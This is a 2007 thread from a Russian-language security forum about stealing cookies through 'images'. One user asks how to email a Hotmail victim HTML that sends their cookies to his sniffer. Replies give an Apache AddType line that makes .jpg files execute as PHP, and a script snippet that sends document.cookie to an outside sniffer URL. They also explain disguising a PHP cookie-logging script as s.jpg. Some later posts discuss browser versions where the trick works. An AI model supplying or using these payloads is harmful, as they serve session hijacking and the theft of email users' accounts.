ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Cookie через рисунки
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Cookie через рисунки
  #1  
Старый 17.03.2007, 12:39
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию Cookie через рисунки
Слыхал можно cookie красть через рисунки на активных хсс.
у кого есть идеии
 
Ответить с цитированием

  #2  
Старый 17.03.2007, 13:01
Srg
Участник форума
Регистрация: 27.01.2006
Сообщений: 118
Провел на форуме:
402743

Репутация: 22
Отправить сообщение для Srg с помощью ICQ
По умолчанию
Товарисчь, картинки - это не в прямом смысле, ты имеешь в виду файлы с расширением jpg которые интерпретируються сервером как php скрипт...

Таким образом - AddType application/x-httpd-php .jpg
 
Ответить с цитированием

  #3  
Старый 17.03.2007, 13:08
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию
нет например жертве маил в хтмл формате отправим, с рисунками. а в рисунках xss на наш сниффер
 
Ответить с цитированием

  #4  
Старый 17.03.2007, 13:18
Srg
Участник форума
Регистрация: 27.01.2006
Сообщений: 118
Провел на форуме:
402743

Репутация: 22
Отправить сообщение для Srg с помощью ICQ
По умолчанию
Ты имеешь ввиду вот это?

Примеры использования сниффера:
Простой вызов по ссылке:
<a href="http://antichat.ru/cgi-bin/s.jpg?it is test">click me</a>
Вызов как картинки:
<img src="http://antichat.ru/cgi-bin/s.jpg">
Вызов из скрипта:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

(с) old.antichat.ru

А эта "картинка" является собой пхп кодом, выполняющимся на сервере и сохраняющая кукисы жертвы
 
Ответить с цитированием

  #5  
Старый 17.03.2007, 13:55
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию
2 ой варриант
но как закапывать коды в рисунок.
например я хочу отправить писмо по хотмаил и когда он откроет писмо куки шли на мой сниффер
 
Ответить с цитированием

  #6  
Старый 17.03.2007, 14:10
Srg
Участник форума
Регистрация: 27.01.2006
Сообщений: 118
Провел на форуме:
402743

Репутация: 22
Отправить сообщение для Srg с помощью ICQ
По умолчанию
Для начала создаешь файл s.php в него пишешь код снифера, затем переименовываешь в s.jpg

Скачать снифер можно с http://kanick.ru, полазий по архиву и разберешься
 
Ответить с цитированием

  #7  
Старый 17.03.2007, 14:45
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
По умолчанию
статейка про это ... тут
 
Ответить с цитированием

  #8  
Старый 13.07.2007, 10:50
George767
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876

Репутация: 81
По умолчанию
.....
Последний раз редактировалось George767; 08.02.2008 в 08:50..
 
Ответить с цитированием

  #9  
Старый 13.07.2007, 10:54
C!klodoL
Постоянный
Регистрация: 05.06.2007
Сообщений: 335
Провел на форуме:
4319431

Репутация: 677
По умолчанию
у тебя internet explorer 7, а видимо надо 6 чтобы работало
 
Ответить с цитированием

  #10  
Старый 13.07.2007, 11:13
DeBugger
Участник форума
Регистрация: 06.09.2006
Сообщений: 139
Провел на форуме:
1026322

Репутация: 124
Отправить сообщение для DeBugger с помощью ICQ
Exclamation
Цитата:
Сообщение от George767  
Если у кого старая версия, плиз откройте этот файлик через нее http://anopov.com/files/ntf/scr/hex/1.png
Мой IE7 открыл эту ссылку как текст такого содержания:
Код:
‰PNG  IHDRђwSЮ pHYs  љњgAMA±Ћ|ыQ“ cHRMz%ЂѓщяЂйu0к`:?o’_ЕFIDATxЪbf``0уЯiIEND®B`‚
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Фальсификация cookie k00p3r Чужие Статьи 6 11.04.2010 19:36
Посылка Cookie через Header (PHP) cop PHP, PERL, MySQL, JavaScript 12 25.11.2006 01:26
Взлом через cookie k00p3r Чужие Статьи 0 13.06.2005 13:56
SQL-injection и не только, через cookies k00p3r Чужие Статьи 0 12.06.2005 12:46
Cookies Болталка 9 11.01.2004 03:43



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ